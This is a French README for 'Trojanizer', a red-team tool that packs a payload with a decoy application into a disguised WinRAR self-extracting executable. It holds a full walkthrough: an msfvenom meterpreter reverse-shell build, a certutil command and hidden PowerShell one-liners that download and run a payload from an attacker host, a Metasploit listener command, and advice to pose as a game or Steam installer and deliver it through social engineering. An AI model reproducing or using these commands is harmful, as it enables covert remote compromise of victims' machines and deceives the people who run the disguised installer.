
Troyanisez votre payload - automatisation WinRAR (SFX) - sous les distributions Linux
Version publiée : v1.1 (Stable)
Auteur : pedro ubuntu [ r00t-3xp10it ]
Nom de code : Troia_Revisited
Distributions prises en charge : Ubuntu, Kali, Mint, Parrot OS
Suspicious-Shell-Activity (SSA) RedTeam développé @2017
L'outil Trojanizer utilise WinRAR (SFX) pour compresser les deux fichiers saisis par l'utilisateur,
et les transforme en une archive exécutable SFX (.exe). L'archive SFX, lorsqu'elle est exécutée,
exécutera les deux fichiers (notre payload et l'application légitime en même temps).
Pour rendre l'archive moins suspecte pour la cible au moment de l'exécution, trojanizer essaiera
de remplacer l'icône par défaut (.ico) du fichier SFX par une icône sélectionnée par l'utilisateur,
et supprimera tous les messages de bac à sable de l'archive SFX (Silent=1 | Overwrite=1).
'Trojanizer ne construira pas de chevaux de Troie, mais du point de vue de la cible, il reproduit le comportement d'un cheval de Troie'
(le payload s'exécute en arrière-plan, tandis que l'application légitime s'exécute au premier plan).
Zenity (GUI bash) | Wine (x86|x64) | WinRAr.exe (installé dans Wine)
"Trojanizer.sh téléchargera/installera toutes les dépendances selon les besoins"
╔────────────────────────────────────────────────────────────────────────────────────────────╗
| Il est recommandé d'éditer et de configurer l'option : SYSTEM_ARCH=[ votre_arch_sys ] |
| dans le fichier 'settings' avant d'essayer d'exécuter l'outil pour la première fois. |
╚────────────────────────────────────────────────────────────────────────────────────────────╝
Trojanizer v1.1-Stable
.exe | .bat | .vbs | .ps1
"Tous les payloads que Windows/SFX peuvent extraire et exécuter automatiquement"
ATTENTION : Si vous sélectionnez 'SINGLE_EXEC=ON' dans le fichier de configuration,
alors trojanizer acceptera tout type d'extension en entrée.
.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc ..
"Toutes les applications que Windows/SFX peuvent extraire et exécuter automatiquement"
╔─────────────────────────────────────────────────────────────────────────────────────────╗
| Les 'options avancées' de Trojanizer ne sont accessibles que dans le fichier 'settings', |
| et elles ne peuvent être configurées qu'avant d'exécuter l'outil principal (Trojanizer.sh) |
╚─────────────────────────────────────────────────────────────────────────────────────────╝
-- Option avancée Presetup
Trojanizer peut être configuré pour exécuter un programme + une commande avant l'extraction/l'exécution
des deux fichiers compressés (archive SFX). Cela permet aux utilisateurs de profiter de logiciels préinstallés
pour exécuter une commande à distance avant que l'extraction réelle ne se produise sur le système cible.
Si activé, trojanizer demandera (boîte de dialogue zenity) la commande à exécuter
Trojanizer v1.1-Stable
-- single_file_execution
Regardons le scénario suivant : Vous avez un payload dll à entrer que vous devez exécuter lors de l'extraction,
mais les archives sfx ne peuvent pas exécuter directement les fichiers dll. Ce paramètre permet aux utilisateurs
d'entrer un script batch (.bat) qui sera utilisé pour exécuter le payload dll.
Tout ce que Trojanizer doit faire, c'est d'instruire l'archive SFX d'extraire les deux fichiers, puis d'exécuter le script.bat
Trojanizer v1.1-Stable
╔────────────────────────────────────────────────────────────────────────────────────────────────╗
| Le comportement par défaut du commutateur single_file_execution est de compresser les deux fichiers saisis par l'utilisateur |
| mais de n'en exécuter qu'un seul au moment de l'extraction (le 2ème fichier saisi sera exécuté) .. |
╚────────────────────────────────────────────────────────────────────────────────────────────────╝
╔────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╗
| Un travail formidable a été réalisé par de nombreuses personnes, en particulier @subTee, concernant le contournement de la liste blanche d'applications |
| ce qui est finalement ce que nous voulons ici : exécuter du code arbitraire en abusant des binaires intégrés de Microsoft. |
| https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ |
╚────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╝
L'exercice suivant décrit comment utiliser les commutateurs avancés 'single_file_execution' et 'Presetup' de trojanizer pour
déposer (téléchargement à distance) et exécuter n'importe quel payload en utilisant les oneliners 'certutil' ou 'powershell'
pour contourner la liste blanche d'applications ..
1º - Utilisez metasploit pour construire notre payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe
2º - Copiez payload.exe dans le répertoire web d'apache2 et démarrez le service
cp payload.exe /var/www/html/payload.exe
service apache2 start
3º - Éditez le fichier 'settings' de Trojanizer et activez :
PRE_SETUP=ON
SINGLE_EXEC=ON
4º - Exécution de l'outil trojanizer
PAYLOAD À COMPRESSER => <chemin-vers>/screenshot.png (peu importe ce que vous compressez)
EXÉCUTER CE FICHIER LORS DE L'EXTRACTION => <chemin-vers>/AngryBirds.exe (à exécuter comme application leurre)
PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f http://192.168.1.69/payload.exe %TEMP%\\payload.exe && start %TEMP%\\payload.exe
NOM DU FICHIER SFX => AngryBirds_installer (le nom de l'archive sfx à créer)
REMPLACER L'ICÔNE => Windows-Store.ico OU Steam-logo.ico
5º - Démarrez un écouteur, et envoyez l'archive sfx à la cible en utilisant l'ingénierie sociale
msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'
╔────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╗
| Lorsque l'archive sfx est exécutée, elle téléchargera payload.exe depuis notre serveur web apache2 vers la cible et |
| l'exécutera avant d'extraire 'screenshot.png' et 'AngryBirds.exe' (ce dernier sera exécuté pour servir de leurre) |
╚────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╝
L'oneliner suivant utilise la méthode 'powershell(Downloadfile+start)' pour obtenir le même résultat que l'exercice précédent avec 'certutil' ..
cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe') & start '%TEMP%\\payload.exe'
L'oneliner suivant utilise la méthode 'powershell(IEX+downloadstring)' pour obtenir presque le même résultat (payload.ps1 ne touche pas au disque)
cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"
1º - Téléchargez le framework depuis github
git clone https://github.com/r00t-3xp10it/trojanizer.git
2º - Définissez les permissions d'exécution des fichiers
cd trojanizer
sudo chmod +x *.sh
3º - Configurez le framework
nano settings
4º - Exécutez l'outil principal
sudo ./Trojanizer.sh
xsf.conf - exécute les deux fichiers lors de l'extraction (comportement de cheval de Troie)
Trojanizer v1.1-Stable
xsf.conf - single_file_execution + Presetup (options avancées)
Trojanizer v1.1-Stable
xsf.conf - single_file_execution + Presetup + contournement de liste blanche d'applications (certutil)
Trojanizer v1.1-Stable
xsf.conf - single_file_execution + Presetup + contournement de liste blanche d'applications (powershell IEX)
Trojanizer v1.1-Stable
Archive sfx finale avec icône modifiée
Trojanizer v1.1-Stable
À l'intérieur de l'archive sfx (ouvrir avec WinRAR) - comportement de cheval de Troie
Trojanizer v1.1-Stable
À l'intérieur de l'archive sfx (ouvrir avec WinRAR) - single_file_execution
Trojanizer v1.1-Stable
Trojanizer - faux installateur antivirus AVG (comportement de cheval de Troie)
https://www.youtube.com/watch?v=BIn6_ccZrI0
Trojanizer - single_file_execution (pas un comportement de cheval de Troie)
https://www.youtube.com/watch?v=Ze0JkVtKbns
@subTee | @enigma0x3 | @H4d3s (SSA)
Références :
http://acritum.com/software/manuals/winrar/
https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-msbuild-exe/
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/
https://github.com/r00t-3xp10it/trojanizer/issues